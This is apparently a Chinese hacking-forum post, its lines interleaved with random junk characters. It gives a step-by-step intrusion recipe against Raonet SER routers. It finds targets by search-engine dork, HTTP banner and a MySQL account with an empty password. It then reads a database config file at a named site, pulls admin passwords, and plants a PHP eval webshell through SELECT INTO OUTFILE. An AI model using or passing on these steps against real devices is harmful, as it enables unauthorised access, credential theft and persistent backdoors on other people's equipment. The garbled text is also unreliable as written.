寻找存在漏洞的路由器方法:2 @2 n0 k* a; f# w/ m9 Z
. Z7 R- ?( v& |9 f; O6 A7 l) F0 v& O4 w
1:google搜索'Raonet Subscriber Ethernet Router'
, R1 o! m" Q3 X7 ^7 P1 B/ y; X2 B: h5 ?# a" s
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001" v0 P! y6 N: b- z }9 U2 C
& e; }8 n5 m: U. O' Y7 b8 E3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。1 f% S9 A2 `0 @- Q1 I6 G- m( u
) x% e3 k. x* M
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......! b- c9 x6 N" o; q
3 @! d, R8 M) t3 D( }. Y ( c( O& t. x0 v. j/ E
8 y$ f }7 T4 ~7 D- X
入侵步骤:
1 @& o3 S* v% w2 |8 \6 r
2 v4 m9 Z# c% d/ j. u, |0 V, u1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
- z/ p9 U7 n6 x1 b* E7 r$ s5 L; m- p& X! B
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
( k- h7 U0 y$ D c3 r, b3:得到密码后连接,查看GUI管理密码:
* D* s1 b5 G5 tuse ser_500
5 I8 A! Y7 a& U2 x ~/ C: Uselect id,passwd from user;3 [7 I) e4 P9 b! c6 X9 G
4:通过数据库写入webshell,执行命令:5 \9 S5 Y! Y( @) m" N. V* h
use mysql;
7 v3 E: Q2 g5 `8 h, }create table ok(cmd TEXT);% F0 N! H3 C: M! O
insert into ok values("<?php @eval($_POST[cmd])?>");
' g( ^' x; w) R5 V! x# gselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
+ \# e2 e- G0 ^7 s5 W2 a/ Udrop table ok;# Z' K( n7 D: X! P5 I p( c' {
4 L9 i$ |. k" j2 o3 R! y) {5:连接后门shell.php
U- V+ V O6 F, z9 b5 y7 g5 c) j" v$ _! e
6. 搞定!
7 A, `9 X6 ]+ O; Q9 d
B* V8 h: K# p; F# B: T4 E |